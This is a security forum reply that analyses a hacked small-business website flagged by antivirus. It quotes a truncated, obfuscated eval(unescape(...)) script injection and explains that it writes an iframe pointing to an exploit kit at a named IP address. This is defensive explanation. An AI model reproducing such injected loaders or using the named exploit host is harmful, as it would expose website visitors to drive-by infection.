Search:  

 
theme to white backgroundlet page decide theme
HomeFind ServiceReviewsISP NewsFAQsForumsToolsDatabaseAbout 
 
   All ForumsHot TopicsGallery






how-to block ads


 
Forums » Up and Running » Security » Security » Question about HTML/Framer.Z
Share Topic:
RSS topic:
toggle:
flat / full
normal / watch
Posting:
Post a:
Post a:
Links: ·Hijack This logs? ·Panda Free Tools ·Vundo Removal
Avira wants to be shure you know about their products »
« Report: boot sector viruses and rootkits poised for comeback  
bobince

join:2002-04-19
DE

Re: Question about HTML/Framer.Z

quote:
only if the page contains a working exploit for your OS/patch level will Norton actually trigger on it
Not necessarily. AVs including Norton also trigger on encoded JavaScript snippets which end up document.write()ing redirections to exploits, regardless of whether the exploit at the end is actually reached. Occasionally this produces false positives with other encoded JavaScripts, but generally speaking obfuscated JavaScript is usually a sign that something dodgy is up.

Trying to come to a conclusion about whether a site is really hacked or not from the responses of popular AVs is a pointless task, as well as likely to get you infected. If you want to really know what's going on, you have to look at the code. It's not that hard and it's much more productive than arguing over which AV is the more canonical (tip: none of them are really that reliable).

So given the above post, we can guess the place to look is view-source:hxxp://tigerjimmytattoo.com/. Immediately obvious at the bottom of that is:

{script}eval(unescape("%77%69%6e%64%6f%77%2e...

Code like this is an immediate big red flag.

Anyhow, should we try unescape()ing this manually, we find it writes out an iframe tag pointing to a 'gpack' exploit kit at 58.65.232.33, a server at known Russian-related malware host HostFresh. Currently the URL leads only to a 404, so it's not quite true to say the site is infected *right now*, but it's definitely been hacked and there probably have been/will be exploits from there at other times.
permalink · 2008-04-04 10:47:23 · Print · Reply to this
Forums » Up and Running » Security » SecurityAvira wants to be shure you know about their products »
« Report: boot sector viruses and rootkits poised for comeback  

Friday, 27-Nov 18:32:55 Terms of Use | Privacy Policy | Hosting by www.nac.net - DSL,Hosting & Co-lo | feedback | contact
over 10 years online! © 1999-2009 dslreports.com.republican-creole
page compression OFF
Most commented news this week
· [119] Time Warner Cable Fires Broadside At Broadcasters
· [111] New AT&T Ad Campaign Hits Back At Verizon
· [95] Apple Joins AT&T Verizon Snark Fest
· [87] New Bill Takes Aim At Higher Verizon ETFs
· [70] TiVo Sees Record Customer Losses
· [68] In-Flight Internet Headed For Bumpy Landing?
· [60] Thanksgiving Open Thread
· [57] Verizon CEO: Hulu Will Be Dead Soon
· [38] EFF Wages War On Fine Print
· [38] ICANN Slams DNS Redirection
Most people now reading
· Windows 7 boot manager editing questions [Microsoft Help]
· 3.x Feral Druid - Bear Tanking Guide [World of Warcraft]
· Leveling to 85 [World of Warcraft]
· [Vista] Why is HD So Full? [Microsoft Help]
· Bell Response to PIPEDA Request [TekSavvy]
· [Newsgroups] Newzleech down? [Filesharing Software]
· Whats the big deal about being "Old School"....? [World of Warcraft]
· Nvidia Forceware for Windows XP\2000\03 195.62 [Software]
· 5 hour energy for diabetic [General Questions]
· HOW-TO: QoS and Tomato (fixes "choppy voice") [MagicJack]